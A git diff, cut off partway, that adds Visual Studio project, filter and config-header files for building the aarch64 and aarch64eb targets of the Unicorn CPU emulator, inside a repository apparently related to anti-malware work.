{F8E85E25-4D67-4A6B-A976-C920790B8798} + {F113B460-4B21-4014-9A15-D472FAA9E3F9} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {1945F27B-ABB3-47F9-9268-A42F73C8B992} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj new file mode 100644 index 0000000..f9f022a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj @@ -0,0 +1,239 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\aarch64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{2A7F483F-CD19-4F84-BBDA-B6A1865E2773}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>aarch64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj.filters new file mode 100644 index 0000000..8467aec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/aarch64-softmmu.vcxproj.filters @@ -0,0 +1,149 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{8a7d2815-3656-4ae7-8eb2-d38da6e8d480}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{9a7f2b42-3f31-4731-84e2-38f535304a1d}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + <UniqueIdentifier>{c74d3c4d-1f19-42c6-bf25-26820a53ac11}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{0e231806-86e4-4e05-8ef8-3e3d36860b00}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{ca50b33c-f5ce-4975-a702-c607bb2fc604}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{1db81436-53cf-4cb6-a474-e76327883bd2}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + <ClInclude Include="..\..\..\qemu\aarch64.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/config-target.h new file mode 100644 index 0000000..6c82c70 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64-softmmu/config-target.h @@ -0,0 +1,5 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_AARCH64 1 +#define TARGET_NAME "aarch64" +#define TARGET_ARM 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj new file mode 100644 index 0000000..41d625f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj @@ -0,0 +1,239 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\aarch64eb.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{340D86A5-E53C-490B-880A-8EB1F5BDE947}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>aarch64ebsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + 